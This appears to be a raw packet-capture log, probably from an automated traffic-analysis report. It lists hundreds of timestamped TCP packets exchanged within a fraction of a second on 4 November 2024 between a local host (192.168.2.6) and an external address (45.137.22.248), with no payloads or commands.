                                                        Nov 4, 2024 04:32:14.154392004 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.154402018 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.154413939 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.154439926 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.154449940 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.154472113 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.154483080 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.154495001 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.154511929 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.154532909 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.154544115 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.154555082 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.154588938 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.154598951 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.154608965 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.154612064 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.154627085 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.154673100 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.154720068 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.154767036 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.154800892 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.154819012 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.154830933 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.154840946 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.154850960 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.154860973 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.154875994 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.154897928 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.154918909 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.154936075 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.154947996 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.154966116 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.155003071 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.155023098 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.155050039 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.155107975 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.155116081 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.155134916 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.155180931 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.155219078 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.155247927 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.155258894 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.155306101 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.155328035 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.155378103 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.155415058 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.155463934 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.155483961 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.155497074 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.155556917 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.155612946 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.155656099 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.155672073 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.155699015 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.155699015 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.155730009 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.155734062 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.155761957 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.155774117 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.155787945 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.155899048 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.155910969 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.155946016 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.156002045 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.156044006 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.156044006 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.156069040 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.156099081 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.156382084 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.156446934 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.156507969 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.156527996 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.156542063 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.156570911 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.156639099 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.156686068 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.156723022 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.156783104 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.156814098 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.156831980 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.156897068 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.156915903 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.156925917 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.157011032 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.157037973 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.157119036 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.157150984 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.157201052 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.157203913 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.157249928 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.157291889 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.157322884 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.157346964 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.157413960 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.157489061 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.157505989 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.157563925 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.157573938 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.157619953 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.157675028 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.157685995 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.157701015 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.157737970 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.157778978 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.157793999 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.157826900 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.157861948 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.157869101 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.157893896 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.158008099 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.158077002 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.158090115 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.158116102 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.158145905 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.158168077 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.158195972 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.158232927 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.158257961 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.158269882 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.158324003 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.158333063 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.158371925 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.158380032 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.158380985 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.158443928 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.158461094 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.158477068 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.158526897 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.158544064 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.158561945 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.158628941 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.158638954 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.158723116 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.158734083 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.158750057 CET4977755615192.168.2.645.137.22.248
                                                        Nov 4, 2024 04:32:14.158827066 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.158890963 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.158986092 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.158996105 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.159029961 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.159056902 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.159100056 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.159118891 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.159219980 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.159229994 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.159260035 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.159383059 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.159487963 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.159498930 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.159539938 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.159576893 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.159607887 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.159620047 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.159728050 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.159806013 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.159876108 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.159884930 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.159956932 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.160012007 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.160021067 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.160054922 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.160099983 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.160110950 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.160238981 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.160248995 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.160339117 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.160347939 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.160384893 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.160394907 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.160484076 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.160495043 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.160522938 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.160573006 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.160615921 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.160626888 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.160664082 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.160675049 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.160682917 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.160752058 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.160762072 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.160772085 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.160780907 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.160799026 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.160927057 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.160937071 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.160945892 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.160957098 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.160965919 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.160974979 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.160984039 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.161066055 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.161076069 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.161083937 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.161093950 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.161102057 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.161112070 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.161122084 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.161133051 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.161140919 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.161150932 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.161159992 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.161169052 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.161178112 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.161185980 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.161195993 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.161281109 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.161292076 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.161299944 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.161309004 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.161457062 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.161467075 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.161474943 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.161494017 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.161504030 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.161514997 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.161583900 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.161592960 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.161611080 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.161648989 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.161704063 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.161715031 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.161751986 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.161761999 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.161809921 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.161844015 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.161917925 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.161927938 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.161946058 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.161988020 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.161998034 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.162020922 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.162075996 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.162092924 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.162121058 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.162161112 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.162221909 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.162231922 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.162241936 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.162292957 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.162338972 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.162389994 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.162399054 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.162439108 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.162489891 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.162502050 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.162602901 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.162632942 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.162705898 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.162714958 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.162775040 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.162851095 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.162861109 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.162969112 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.162977934 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.162988901 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.163012028 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.163022041 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.163031101 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.163124084 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.163134098 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.163141966 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.163151979 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.163213968 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.163223982 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.163233042 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.163243055 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.163252115 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.163297892 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.163307905 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.163331032 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.163362980 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.163373947 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.163383007 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.163393021 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.163410902 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.163444042 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.163482904 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.163500071 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.163610935 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.163620949 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.163665056 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.163703918 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.163747072 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.163755894 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.163821936 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.163831949 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164032936 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164043903 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164052963 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164062977 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164072037 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164082050 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164089918 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164099932 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164108038 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164118052 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164160967 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164170980 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164180040 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164189100 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164197922 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164206982 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164215088 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164223909 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164232969 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164242029 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164257050 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164267063 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164275885 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164284945 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164341927 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164387941 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164402962 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164414883 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164469004 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164478064 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164484024 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164519072 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164580107 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164587975 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164628029 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164638042 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164680004 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164690018 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164729118 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164737940 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164762974 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164813995 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164858103 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164866924 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164875984 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164896011 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164906025 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164913893 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164973021 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164982080 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164990902 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.164999008 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.165041924 CET556154977745.137.22.248192.168.2.6
                                                        Nov 4, 2024 04:32:14.165051937 CET556154977745.137.22.248192.168.2.6
